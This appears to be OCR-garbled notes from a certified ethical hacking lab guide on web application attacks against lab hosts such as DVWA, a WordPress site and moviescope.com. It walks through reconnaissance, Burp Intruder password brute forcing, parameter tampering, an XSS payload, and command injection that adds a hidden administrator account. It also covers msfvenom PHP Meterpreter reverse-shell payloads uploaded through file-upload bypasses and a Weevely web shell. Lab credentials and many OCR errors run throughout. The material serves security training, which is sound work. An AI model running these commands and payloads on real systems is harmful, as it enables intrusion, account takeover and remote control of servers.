Web Application Reconnaissance
Perform a Whois lookup to gad1er information about d1e IP address of the web server and the complete information about the domain such as its registration details, 
name servers, IP address, and location.
4. Use tools such as Netcraft (https://www.netcraft.com), SmartWhois (https:/ /www.tamos.com), WHOIS Lookup (http://whois.domaintools.com), and Batch IP Converter
(http://www.sabsoft.com) to perfonn the Whois lookup.
S. Perfonn DNS lnterrogation to gather information about the DNS servers, DNS records, and types of servers used by the target organization. 
DNS zone data include DNS domain names, computer names, IP addresses, domain mail servers, service records, etc.
6. Use tools such as Professional Toolset (https://tools.dnsstuff.com), DNSRecon (https://github.com), and DNS Records (https://networktools.com), 
Domain Dossier (https://centralops.net) to perform DNS interrogation.

Scaning

In the Parrot Terminal window, type nmap -T4 -A -v <Target Web Application> (here, the target web application is www.moviescope.com)
and press Enter to perfonn a port and service discovery scan.
N ot e: In this command, -T4: specifies setting time template (0-5), -A:specifies setting ACK flag, and -v: enables the verbose output (include all
hosts and ports in the output).
The result appears, displaying the open ports and services running on the machine hosting the target website
Scroll down to see the complete results. You can observe that the target machine name, NetBIOS name, DNS name, i\tlAC address, OS, and
other information is displayed

banner grabbing

In the terminal window, type telnet www.moviescope.com 80 and press Enter to establish a telnet connection with the target machine.
N ote: Port 80 is the port number assigned to the commonly used Internet communication protocol, HypertextTransfer Protocol (HITP).
The Trying 10.10.10.19 ... message appears; type GET 1 HTTP/1.0 and press Enter two times
The result appears, displaying information related to the server name and its version, technology used.
19. Here, the server is identified as Microsoft-IIS/10.0 and the technology used is ASP.NET.

WhatWeb

In the Tenninal window of Parrot, type whatweb and press Enter. It displays a list of the commands available with WhatWeb.
Now, type whatweb <Target Web Application> (here, the target web application is www.moviescope.com) and press Enter to perform website
footprinting on the target website.
7. The result appears, displaying d1e MovieScope website infrastructure, 
In the terminal, type whatweb -v <Target Web Application> (here, the target web application is www.moviescope.com) and press Enter to run
a verbosity scan on the target website.
The result appears, displaying a detailed report on the target website such as its IP address, plugin information, and HTTP header information
Now, type whatweb --log-verbose=MovieScope_Report www.moviescope.com and press Enter to export the results returned by WhatWeb as a text file.
N ote: This will generate a report with the name MovieScope_Report and save this fue in the root folder 

OWASP ZAP

In a Parrot Terminal; type zaproxy and press Enter to launch OWASP ZAP.
The OWASP ZAP main window appears. Under the Quiek Start tab, click the Automated Scan option under Welcome to OWASP ZAP
The Automated Sean wizard appears; enter the target website under the URL to attaek field (here, www.movieseope.eom). Leave the other
settings to default and click the Attaek button.
OWASP ZAP starts scanning the target website. You can observe various URLs under the Spider tab
After perfonning web spidering, OWASP ZAP performs active scanning.
Navigate to the Active Sean tab to observe the various scanned links.
12. After completing the active sean, the results appear under the Alerts tab, displaying the various vulnerabilities and issues associated with the target website
N ote: In this task, the objective being web spidering, we will focus on the information obtained while performing web spidering
Now, click on the Spider tab from the lower section of the window to view the web spidering information. By default, the URLs tab appears under the Spider tab.
14. The URLs tab contains various links for hidden content and functionality associated with the target website (www.moviescope.com).
Now, navigate to the Messages tab under the Spider tab to view more detailed infonnation regarding the URLs obtained while performing the web spidering, 

Detect Load Balancers

In the Terminal in Parrot; type dig yahoo.com and press Enter.
6. The result appears, displaying the available load balancers of the target website. Here, a single host resolves to  multiple IP addresses, 
which possibly indicates that the host is using a load balancer
Now, type lbd yahoo.com and press Enter.
8. The result appears, displaying the available DNS load balancers used by the target website, 

ldentify Web Server Directories
Nmap
In the terminal window in Parrot; type nmap -sV --script=http-enum <target domain or IP address> (here, www.moviescope.com) and press Enter.
The result appears, displaying open ports and services, along with their version.
7. Scroll-down in the result and observe the identified web server directories under the http-enum
Gobuster
Now, we shall copy the wordlist ftle (common.txt) from a shared network drive. We will use this file in the Gobuster tool.
9. Open any explorer window and press Ctrl+L. The Location field appears; type smb://10.10.10.1O and press Enter to access Windows 1O shared folders.
10. The security pop-up appears; enter the Windows 10 virtual machine credentials (Usemame: Admin and Password: Pa$$w0nl) and clickConnect.
11. The Windows shares on 10.10.10.1O window appears; double-click the CEH-Tools folder.
Navigate to CEHv11 Module 14 Hacking Web Applications, copy the common.txt file.
Paste the common.txt into the /home/attacker directory, close the window Now, switch back to the terminal window, Type mv /home/attacker/common.txt /root/Desktop/ 
and press Enter to move the common file to the Desktop.
15. In the terminal window, type gobuster dir -u <Target Website> -w /root/Desktop/common.txt, and press Enter.
Note: dir: uses directory or file brute-forcing mode, -u: specifies the target URL, and -w: is the wordlist file used for directory brute-forcing (here, common.txt).
16. The result appears, displaying the identified web server directories,

Vega

In windows 10 Navigate tome location E:\CEH-Tools\CEHv11 Module 14 Hacking Web Applications\Web Application Hacking Tools\Vega and double-click VegaSetup64.exe
The Subgraph Vega main window appears
Click Scan from the menu bar and select Start New scan from the  available options
The Select a Scan Target window appears on the screen. Ensure that the Enter a base URI for sean radio button is selected under the Scan Target section.
15. In the Enter a base URI for sean field, enter the target URL as http://10.10.10.16:8080/dvwa and click Next 
The Select Modules wizard appears; double-click on both of the checkboxes (lnjection Modules and Response Processing Modules) to select all options.
17. By checking these options, all modules under these options will be selected. Click Next
In the Authentication Options wizard, leave the settings to default and click Next
In Parameters wizard, leave the settings to default and click Finish to initiate the scan
The Follow Redirect? pop-up appears; click Yes to continue
The Vega application starts scanning the target website for vulnerabilities.
Observe the Scanner Progress bar and wait for it to finish.
N ote: In the left-hand pane, under the Sean Alerts section, you can see the scan status as Auditing. As soon as Vega completes, the scan status changes to Completed
After the scanner finishes performing its vulnerability assessment on the target website, it lists the discovered vulnerabilities under Scan Alert Summary.
In the left-pane under Sean Alerts, expand the nodes to view the complete vulnerability scan result. Now, choose any one of the discovered vulnerabilities to 
display it on the respective page, as in the dashboard section shown in the screenshot.
24. Choose any one vulnerability under the Scan Alerts section in the lefthand pane. Here, we are selecting the Cleartext Password over HTTP
vulnerability; detailed information regarding the selected vulnerability will be displayed in the right section of the window
Similarly, you can select any vulnerability from the list of discovered vulnerabilities to view its detailed information and then apply appropriate
fixes for all the vulnerable codes in your web application

Burpsuite
Brute force
In parrot Click the Firefox icon from the top section of Desktop to launch the Mozilla Firefox browser.
8. The Mozilla Firefox window appears; type http://10.10.10.16:8080/CEH/wp-login.php? lnto the address bar and press Enter
Now, we shall set up a Burp Suite proxy by first configuring the proxy settings of the browser
The Connection Settings window appears; select the Manual proxy configuration radio button and specify the HTTP Proxy as 127.0.0.1 and the
Port as 8080. Tick the Use this proxy server for all protocols checkbox and click OK. Close the Preferences tab
Start Burpsuite
The Burp Suite main window appears; click the Proxy tab from the available options in the top section of the window.
In the Proxy settings, by default, the lntercept tab opens-up. Observe that by default, the interception is active as the button says lntercept is on. Leave it running
Switch back to the browser window. On the login page of the target WordPress website, type random credentials, here admin and password.
Click the Log In button
Switch back to the Burp Suite window; observe that the HTTP request was intercepted by the application
Now, right-click anywhere on the HITP request window, and from the context menu, click Send to lntruder
Now, click on the lntruder tab from the toolbar and observe that under the lntruder tab, the Target tab appears by default.
27. Observe the target host and port values in the Host and Port fields
Click on the Positions tab under the lntruder tab and observe that Burp Suite sets the target positions by default, as shown in the HTTP request.
Click the Clear § button from the left-pane to clear the default payload values.
Once you clear the default payload values, select Cluster bomb from the Attack type drop-down list.
Note: Cluster bomb uses multiple payload sets. There is a different payload set for each defined position (up to a maximum of 20). The attack iterates
through each payload set in turn so that all permutations of payload combinations are tested. For example, if there are two payload positions, the
attack will place the first payload from payload set 2 into position 2 and iterate through all payloads in payload set 1 in position 1; it will then place the second
payload from payload set 2 into position 2 and iterate through all the payloads in payload set 1 in position 1
Now, we will set the username and password as the payload values. To do so, select the username value entered in Step 23 and click Add § from the left-pane.
31. Similarly, select the password value entered in Step 23 and click Add § from the left-pane
Open any explorer window and press Ctri+L. 
34. The security pop-up appears; enter the Windows 10 virtual machine credentials (Usemame: Admin and Password: Pa$$w0rd) and click Connect.
35. The Windows shares on 10.10.10.10 window appears; double-click  CEH-Tools folder.
Paste the Wordlist folder into the /home/attacker/Desktop directory, as shown in the screenshot
36. Navigate to CEHv11 Module 14 Hacking Web Applications and copy Wordlist folder.
Switch back to me Burp Suite window.
39. Navigate to the Payloads tab under the lntruder tab and ensure that under the Payload Sets section, the Payload set is selected as 1, and the
Payload type is selected as Simple list.
40. Under the Payload Options [Simple list] section, click me Load ... button.The Location field appears; type smb://10.10.10.1O and press Enter 
to access Windows 1O shared folders.
A ftle selection window appears; navtgate to the /home/attacker/Desktop/Wordlist, select the username.txt click the Open button
Observe that the selected username.txt file content appears under the Payload Options [Simple list] section, as shown in the screenshot
Similarly, load a password file for the payload set 2. To do so, under the Payload Sets section, select the Payload set as 2 from the drop-down
options and ensure that the Payload type is selected as Simple list
Under the Payload Options [Simple list] section, click the Load ••• button
A file selection window appears; navigate to the location /home/attacker /Desktop/Wordlist , select the password.txt file, and click the Open button
Observe that selected password.txt file content appears under the Payload Options [Simple list] section, as shown in the screenshot.
4 7. Once the wordlist files are selected as payload values, click the Start attack button to launch the attack
A Burp lntruder notiflcation appears. Click OK to proceed
The lntruder attack 1 window appears as the brute-attack initializes. It displays various usemame-password combinacions along with the Length of
the response and the Status.
50. Wait for the progress bar at the bottom of the window to complete
After the progress bar completes, scroll clown ancl observe d1e different values of Status and Length. Here, Status=302 and Length= 1131.
N ote: Different values of Status ancl Length inclicate d1at the combinacion of the respective credentials is successful.
52. In the Raw tab tmcler the Request tab, the HTTP request with a set of the correct credencials is displayed. (here, username=admin ancl
password=qwerty@123), as shown in the screenshot.

Perform Parameter Tampering
In the Proxy settings, by default, the lntercept tab opens-up. You can observe that, by default, the interception is active, as the button says lntercept
is on. Leave it running
Switch back to the browser window, and on the login page of the target website (www.moviescope.com), enter the credentials sam and test. Click the Log In button.
Now, keep clicking the Forward button until you are logged into the user account
Now, click the View Profile tab from the menu bar to view the user information.
After clicking the View Profile tab, switch back to the Burp Suite window and keep clicking the Forward button until you get the HTTP request, 
22. Now, navigate to the Params tab under the lntercept tab to view the captured parameters.
Under the Params tab, observe a table with captured values such as URL and Cookie.
24. In the URL type with the name id, double-click the Value column to change it from 1 to 2,
After changing the value, navigate back to the Raw tab
In the Raw tab, click the lntercept is on button to turn off the interception
After switching off the interception, navigate back to the browser window and observe that the user account associated with ID= 2 appears with the
name John, as shown in the screenshot
Note: Although we logged in using sam as a username with ID=1, using Burp Suite, we successfully tampered with the ID parameter to obtain information
about other user accounts

Exploit Parameter Tampering and XSS Vulnerabilities

On the Windows 10 virtual machine, login withi the credentials Admin and Pa$$w0rd.
3. Open any web browser (here, Mozilla Firefox), type http://www.moviescope.com/ into the address bar, and press Enter.
4. The MovieScope website appears. In the Login form, type Username and Password as steve and password, and click Login.
You are logged into the website. Click the View Profile tab from the menu bar.
You will be redirected to the profile page, which displays the personal information of steve (here, you). You will observe that the value of ID in the
personal information and address bar is 4.
Now, try to change the parameter in the address bar to id=1 and press Enter.
8. You will be redirected to the pro file of sam without having to perform any hacking techrúques to explore the database. Here, you can observe Sam's
personal information under the View Profile tab,
N ote This process of changing the ID value and getting the result is known as parameter tampering. Web XSS attacks exploit vulnerabilities on
dynamically generated web pages. This enables malicious attackers to inject client-side scripts into the web pages viewed by other users.
11. Now, click the Contacts tab. Here you will be performing an XSS attack
The Contacts page appears; enter your name or any random name (here, steve) in the Name field; en ter the cross-site script <script>alert("Y ou are
hacked")</script> in the Comment field and click the Submit Comment button.
On this page, you are testmg for XSS vulnerability. Now, refresh the Contacts page.
Note: If a notification appears saying To display this page, Firefox must send information .... , click the Resend button

Perform Cross-site Request Forgery (CSRF) Attack

Now, open any web browser (here, Mozilla Firefox) and type http://1 0.1 0.1 0.16:8080/CEH/wp-login.php? In the address bar, and press Enter.
Note: Here, we are opening d1e above-mentioned website as the victim.
7. A WordPress webpage appears. Type Usemame or Email Address and Password as admin and qwerty@123. Click the LogIn button
Assume that you have installed and configured the Firewall plugin for this site and that you want to check the securíty configurations.
9. hover your mouse cursor on Plugins in the left pane and click lnstalled Plugins
In the Plugins page, observe that leenk.me is installed. Click Activate under the leenk.me plugin to actívate the plugin
Refresh the page and observe that the leen k. me plugin option appears in the left pane; click it.
12. Thee leenk.me General Settings page appears. Tick the Facebook checkbox in the Choose which social network modules you want to
enable for this site option under the Administrator Options section and click the Save Settings button
The leenk.me General Settings page appears, as shown in the screenshot
Ensure that under the Administrator Options section, the Facebook checkbox is selected in the Choose which social network modules you
want to enable for this site option and click the Facebook Settings hyperlink
A Facebook Settings page appears; tmder Message Settings, enter the details below:
• Default Message: This is CEH lab.
• Default Link Name: CEH.com
• Default Caption: CEH Labs
15. Clear the Default Description text field. Leave the other settings to default and click the Save Settings button to save the settings
Now, switch to the Parrot Security
T11e Mozilla Firefox window appears. Type https://wpvulndb.com/users/sign_up into the address bar and press Enter.
20. A webpage with a Register a new user form appears; enter your personal details in the given fields. In the Your Website field, enter the website as
http://10.10.10.16:8080/CEH and click d1e REGISTER button
On the next page, the WPScan Vulnerability Database appears along with a notification saying A message with a confirmation link has been sent to your email address ...
22. Now, open a new tab in the Firefox browser and open the email account you gave while registering as a new user in Step 20.
23. Once you are logged into your email account, open rl1e email from noreply@wpvulndb.com, and in the email, click the Confirm my account hyperlink
A new webpage appears with a message saying Your email address has been successfully confirmed. Enter the same details in the Email Address and Password fields that you provided
The Edit Profile page appears; scroll down to the API Token section and observe the API Token. Note down this API Token; we will use this tokenin the later steps.
In the Terminal winqow, type wpscan --api-token <API Token from Step#26> --url http://10.10.1.16:8080/CEH --plugins-detection aggressive --enumerate vp and press Enter.
Note: - -enumerate vp: specifies the enumeration of vulnerable plugins
The result appears, displaying detailed information regarding the target website
Scroll clown to the Plugin(s) ldentified section, and observe the installed vulnerable plugins (akismet and leenkme) on the target website.


Enumerate and Hack a Web Application using WPScan and Metasploit

In the Terminal window, type wpscan --api-token <API Token> --url http:/110.10.10.16:8080/CEH --enumerate u and press Enter.
Note: --enumerate u: specifies the enumeration of usernames.
Note: Here, we will use the API token that we obtained by registering with me https://wpvulndb.com/users/sign_up website.
WPScan begins to enumerare me usernames stored in the website's
database. The result appears, displaying detailed information from the target website.
7. Scroll clown to the User(s) ldentified section and observe the information regarding d1e available user accounts.
To obtain d1e passwords, you will use d1e auxiliary module called wordpress_login_enum (in msfconsole) to perform a dictionary attack
using the password.txt fue (in the Wordlist folder) which you copied to the location /home/attacker/Desktop in the previous task.
1O. To use the wordpress_login_enum auxiliary module, you need to first launch msfconsole. However, be fore this, you need to start the PostgreSQL service.
11. In the terminal window, type service postgresql start and press Enter to start the PostgreSQL service.
Type msfconsole and press Enter to launch the Metasploit framework.
13. In msfconsole, type use auxiliary/scanner/http/wordpress_login_enum and press Enter
To know all options available to configure in this Metasploit module, type show options, and press Enter.
16. This provides a list of options that can be set for this module. As we must obtain the password for the target user account, we will set the below options:
PASS_FILE: Sets the password.txt file, using which; you will perform the dictionary attack
RHOST: Sets the target machine (here, the Windows Server 2016 IP address)
RPORT: Sets the target machine port (here, the Windows Server 2016 port) 8080
TARGETURI: Sets the base path to d1e WordPress website (here, http://[IP Address of Windows Server 2016]:8080/CEH]
USERNAME: Sets the username that was obtained in Step 7. (here,admin)
All the options have successfully been set. Type run and press Enter to execute the auxiliary module.
The auxiliary module tests various passwords against the given username (admin) and the cracked password is displayed

Exploit a Remote Command Execution Vulnerability to Compromise a Target Web Server

windows10 Open any web browser (here, Mozilla Firefox), type http://10.10.10.16:8080/dvwa/login.php into the address bar, and press Enter.
The Vulnerability: Command lnjection page appears; under the Ping a device section, type the IP address of the Windows Server 2016 virtual
machine (here, 10.10.10.16) into the Enter an IP address field and click the Submit button to ping the machine
The Vulnerability: Command lnjection page appears; type | hostname into the Enter an IP address field, and click Submit.
19. DVWA returns the name of d1e Windows Server 2016 virtual machine, as shown in the screenshot.
Type the command | whoami and click Submit.
Type the command | tasklist and click Submit.
Type | Taskkill /PID [Process ID value of the desired process] /F (here, PID is 2192) and click Submit . By issuíng this command, you are
forcefully (IF) terminating d1e process.
Now, to view the directory structure o f the Windows Server 2016 virtual machine, type | dir C:\ and click Submit to view the files and directories on the C:\ drive.
To view user account information, type | net user, and click Submit
Create an account named Test. To do so, type | net user Test /Add and click Submit .
To view the new user account, type the command | net user and click Submit.
39. You can observe the newly created account Test
Now, view the new account's information. Type | net user Test and click Submit.
Now, assign administrative privileges to the account. The reason for granting administrative privileges to this account is to use this (admin)
accout to log into the Windows Server 2016 machine with administrator access using a remote desktop connection.
43. To grant administrative privileges, type | net localgroup Administrators Test /Add and click Submit
You have successfully granted admin privileges to the accotmt. Confirm the new setting by issuing the command | net user Test. Test is now an
administrator account under the Local Group Memberships option
Now, log into the Windows Server 2016 virtual machine using the Test
accotmt through Remote Desktop Connection.
46. Click the Type here to search field from the bottom of Desktop and type Remote. Click Remote Desktop Connection from the results.
47. The Remote Desktop Connection window appears. In d1e Computer field, type the target system IP address (here, 10.10.10.16 [Windows Server2016]) and click Show Options
The Remote Desktop Connection window appears with the General tab displayed; enter the User name as test and click Connect
leave the Password field empty and click OK

Exploit a File Upload Vulnerability at Different Security Levels
Low
A Parrot Terminal window appears; type msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address of Host Machine> LPORT=4444 -f raw and press Enter.
N ote: Here, d1e IP address of me host machine is 10.10.10.13 (the  Parrot Security virtual machine).
The raw payload is generated in the terminal window. Select the payload, right-click on it, and click copy from the context menu to copy the payload
Now, in the terminal window, type cd /home/attacker/Desktop and press Enter to navigate to the Desktop folder.
1 O. Type pluma upload.php and press Enter to launch the Pluma text editor
press Ctri+V to paste the raw payload copied in Step 8, and then press Ctri+S to save the content
Click the Firefox icon m from the top section of Desktop, type http://10.10.10.16:8080/dvwa/login.php. lnto the address bar and press Enter.
13. The DVWA login page appears; enter the Username and Password as admin and password. Click the Login button
Click the File Upload option from the left pane.
17. The Vulnerability: File Upload page appears; click the Browse ••• button to upload a file
When the File Upload window appears, navigate to the Desktop location, select the payload file upload.php, and click Open.
Now, click the Upload button to upload the file to the database
In the terminal Parrot, type msfconsole and press Enter to launch the Metasploit framework.
27. In msfconsole, type use exploit/multi/handler and press Enter to set up the listener.
Now, set the payload, LHOST, and LPORT. Todo so, use the below commands:
Type set payload php/meterpreter/reverse _tcp and press Enter
Type set LHOST 10.10.10.13 and press Enter
Type set LPORT 4444 and press Enter
Type run and press Enter to start the listener
29. Observe that the listener is up and running at 10.10.10.13. Minimize the terminal window.
Switch back to the Mozilla Firefox window where the DVWA website is
open. Press Ctrl+T to open a new tab, type http://10.10.10.16:8080/dvwa/hackable/uploadslupload.php) in the address bar, and press Enter to execute the uploaded payload.
Switch back to the Terminal window and observe that a Meterpreter session has successfully been established with the victim system, 
In the meterpreter command line, type sysinfo and press Enter to view the system details of the victim machine
Medium
In the Terminal window, type msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address of Host Machine> LPORT=3333 -f raw and press Enter.
Note: Here, the IP address of the host machine is 10.10.10.13 (Parrot Security virtual machine).
39. The raw payload is generated in the tenninal window. Select the payload, right-click on it, and click copy from the context menu to copy the payload
Now, in d1e terminal window, type cd /home/attacker/Desktop and press Enter to navigate to the Desktop folder.
41. Type pluma medium.php.jpg and press Enter to launch the Pluma text editor  and copy the raw
Click the File Upload option in the left pane.
47. The Vulnerability: File Upload page appears; click the Browse ••• button to upload a file
Active proxy and start burpsuite
In the Proxy settings, by default, the lntercept tab opens-up. Observe that the interception is active by default, as the button says lntercept is on. Leave it runrung.
Switch back to the browser window and click the Upload button under the Vulnerability: File Upload section to upload the payload file
Switch back to the Burp Suite window. Observe that the request has been captured and displayed in the raw format under the Raw tab. In fi1e filename
field, you will see the name of the file to be uploaded as medium.php.jpg.
Change the filename to medium.php and click the Forward button to forward the request
Now, turn the interception off byclicking on the lntercept is on button. The button now says lntercept is off,  Close the window.
Switch back to the browser window. Observe a message saying that the file has been uploaded successfully, along with the upload location of the file. Note down this location.
Remove the browser proxy set up in Step 54 by selecting the No proxy radio-button in the Connection Settings window and clicking OK. Close the tab
Now, type cd and press Enter to jump to the root directory.
72. In the Terminal window, type msfconsole and press Enter to launch the Metasploit framework.
73. In msfconsole, type use exploit/multi/handler and press Enter to begin setting up the listener.
74. You have to set up a listener so that you can establish a Meterpreter session with your victim. Follow the steps given below to set up a listener
using the msf command line:•
Type set payload php/meterpreter/reverse_tcp and press Enter
Type set LHOST 10.10.10.13 and press Enter
Type set LPORT 3333 and press Enter .
Type run and press Enter to start the listener
Switch to the Mozilla Firefox window where the DVWA website is open.
Press Ctri+T to open a new tab, type http://10.10.10.16:8080/dvwa/hackable/uploadslmedium.php) into the address bar and press Enter to execute the uploaded payload.
Switch back to the Terminal window and observe that a Meterpreter session has successfully been established with the victim system.
77. In the meterpreter command line, type sysinfo and press Enter to view the system details of the victim machine
High
In the Terminal window, type msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address of Host Machine> LPORT=2222 -f raw and press Enter.
84. The raw payload is generated in the terminal window. Select the payload, right-click on it, and click c.opy from the context menu to copy the payload
Now, in the terminal window, type cd /home/attacker/Desktop and press Enter to navigate to the Desktop folder.
Type pluma high.jpeg and press Enter to launch the Pluma text editor.
The Pluma text editor window appears; press Ctrl+V to the paste the raw payload code copied in Step 84.
Edit the payload file by adding GIF98 to d1e first line and press Ctrl+S to save
Click the Firefox icon from the top section of Desktop, type http://10.10.10.16:8080/dvwa/login.php into the address bar and press
Enter. The DVWA login page appears. Log in with the credentials admin and password, and click the Login button
The Vulnerability: File Upload page appears. Click the Browse ••• button to upload a file
The File Upload window appears. Navigate to the Desktop location, select the payload file high.jpeg, and click Open
Now, click the Command lnjection option in the left pane. The Vulnerability: Command lnjection window appears; in the Enter an IP address field, type 
|copy C:\wamp64\www\DVWA\hackable\uploads\high.jpeg C:\wamp64\www\DVWA\hackable\uploads\shell.php and click the Submit button.
In the Terminal window, type msfconsole and press Enter to launch the Metasploit framework.
104. In msfconsole, type use exploit/multi/handler and press Enter to set up the listener.
105. To establish a Meterpreter session with your victim, you have to set up a listener. Todo so, follow the steps given below to set up a listener using the
msf command line:
Type set payload php/meterpreter/reverse_tcp and press Enter
Type set LHOST 10.10.10.13 and press Enter
Type set LPORT 2222 and press Enter
Type run and press Enter to start the listener
Switch to the Mozilla Firefox window where the DVWA website is open.
Press Ctrl+T to open a new tab, type http://10.10.10.16:8080/dvwa/hackable/uploads/shell.php) into the address bar and press Enter to execute the uploaded payload
Switch back to the Terminal window and o bserve that a Meterpreter session has successfully been established with the victim system.
108. In the meterpreter command line, type sysinfo and press Enter to view the system details of the victim machine.

Weevely

In the terminal window in Parrot; type weevely generate <Password> <FilePath> (here, the password is toor, and the file path is /home/attacker/Desktop/shell.php) 
and press Enter to generate a shell ftle.
Note: Weevely encodes the payload with a key phrase so that no one else can use it to access the target system.
Now, click the Firefox icon from the top section of Desktop, type http://1O.1O.1O.16:8080/dvwa/login.php into the address bar, and press  Enter
Click the File Upload option from d1e left pane.
12. The Vulnerability: File Upload page appears. Click the Browse ••• button to upload a file
The File Upload window appears; navigate to the Desktop location, select the payload file shell.php, and click Open
You will see a message that the file has successfully been uploaded, with the location of the file. Note the location o f the file and minimize the browser window.
Switch back to d1e Terminal window, type weevely http://10.10.10.16:8080/dvwa/hackable/uploads/shell.php <Password>
(The password that you have provided in Step#S), and press Enter. This command establishes a connection with the payload and interacts with the target.
Now, type whoami and press Enter to view the system details of the victim machine
Now, type ipconfig and press Enter to view the IP configuration of the victim machine

NStalkerWebSecuñtyScanner

Navigate to the location Z:\CEHv11 Module 14 Hacking Web Applications\Web Application Secuñty Testing Tools\N-Stalker Web Application Security Scanner and double-click NStalkerWebSecuñtyScanner-
FreeX-b34.exe.
The N-Stalker Web Application Security Scanner main window appears; click the Update button under the N-Stalker Update Status section.
now press start
The N-Stalker Sean Wizard appears. Under the Enter Web Application URL field, enter http://www.moviescope.com and under Choose Sean Policy
field, select OWASP Policy from the drop-down list; click Next.
The Optimize Settings wizard appears; leave the default settings and click Next.
If a Settings Not Optimized pop-up appears, click Yes.
15. The Review Summary wizard appears. Verify the Scan Settings and click Start Session
If an N-Stalker Free Edition pop-up appears; click OK to continue
17. After completing the configuration of N -Stalker, click Start Scan from the menu bar to begin scanning the MovieScope website
N-Stalker begins to sean the website. It goes through various steps such as Step 1 Spider, Step 2 lnfo Gather, Step 3 Run Modules, and Step 4 Sig Scanner,
Ensure that the Save sean results radio button is selected under the Session Management Options section; and under the Next Steps section, select the
Keep scan session for further analysis radio button and click Next
N-Stalker displays a summary of the vulnerabilities found. After examining the summary, click the Done button
In the left pane, expand all the nodes and sub-nodes of the URL http://www.moviescope.com/ under the Website Tree section. This displays the website's pages.
Now, click to expand the URL http://www.moviescope.com/ under Vulnerabilities in the Scanner Events section to view all the site's vulnerabilities.
Expand any of the discovered vulnerability nodes and any of the sub-nodes associated wid1 it. Here, we are expanding the first vulnerability, Application
might be vulnerable to clickjacking attacks
